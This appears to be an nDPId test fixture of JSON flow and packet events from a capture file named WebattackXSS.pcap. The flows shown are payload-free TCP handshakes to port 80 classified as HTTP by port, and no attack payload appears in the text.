+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347908253,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347908253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XLdAAD4GaRmsEAABwKgKMoSkAFDBACLDAAAAAKACchB2mwAAAgQFtAQCCAoBPH50AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":2,"flow_last_seen":1499347908253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347908253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhKRv9+kSwQAixKAScSDKoQAAAgQFtAQCCAoD5k\/oATx+dAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":3,"flow_last_seen":1499347908254,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347908254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XLhAAD4GaSCsEAABwKgKMoSkAFDBACLEb\/fpE4AQAOVpqQAAAQEICgE8fnQD5k\/o"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347909575,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347909575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/H5AAD4GyVGsEAABwKgKMoSyAFC+M4PAAAAAAKACchAXEwAAAgQFtAQCCAoBPH++AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":2,"flow_last_seen":1499347909575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhLJ\/QSQIvjODwaAScSAfjwAAAgQFtAQCCAoD5lEzATx\/vgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":3,"flow_last_seen":1499347909576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347909576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/H9AAD4GyVisEAABwKgKMoSyAFC+M4PBf0EkCYAQAOW+lQAAAQEICgE8f78D5lEz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347912141,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347912141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AShAAD4GxKisEAABwKgKMoTMAFAccoNoAAAAAKACchC2kAAAAgQFtAQCCAoBPIJAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":2,"flow_last_seen":1499347912141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhMwGDz+bHHKDaaAScSAaKwAAAgQFtAQCCAoD5lO0ATyCQAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7847,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":3,"flow_last_seen":1499347912142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347912142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ASlAAD4GxK+sEAABwKgKMoTMAFAccoNpBg8\/nIAQAOW5MgAAAQEICgE8gkAD5lO0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347913416,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347913416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80\/hAAD4G8desEAABwKgKMoTaAFDALVCHAAAAAKACchBEaQAAAgQFtAQCCAoBPIN\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":2,"flow_last_seen":1499347913416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhNreW6gWwC1QiKAScSBl\/AAAAgQFtAQCCAoD5lTzATyDfwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":3,"flow_last_seen":1499347913417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347913417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00\/lAAD4G8d6sEAABwKgKMoTaAFDALVCI3luoF4AQAOUFBAAAAQEICgE8g38D5lTz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347914710,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347914710,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oQ5AAD4GJMKsEAABwKgKMoToAFDafCXMAAAAAKACchBThAAAAgQFtAQCCAoBPITCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7869,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":2,"flow_last_seen":1499347914710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhOgBH2BK2nwlzaAScSCY3AAAAgQFtAQCCAoD5lY3ATyEwgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":3,"flow_last_seen":1499347914711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347914711,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oQ9AAD4GJMmsEAABwKgKMoToAFDafCXNAR9gS4AQAOU34wAAAQEICgE8hMMD5lY3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347917322,"flow_last_seen":1499347917322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347917322,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1499347917322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917322,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CqdAAD4GuymsEAABwKgKMoUCAFC+4o3oAAAAAKACchAEWwAAAgQFtAQCCAoBPIdPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":2,"flow_last_seen":1499347917323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhQJ4jpXCvuKN6aAScSCaPgAAAgQFtAQCCAoD5ljEATyHTwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":3,"flow_last_seen":1499347917323,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347917323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CqhAAD4GuzCsEAABwKgKMoUCAFC+4o3peI6Vw4AQAOU5RQAAAQEICgE8h1AD5ljE"} 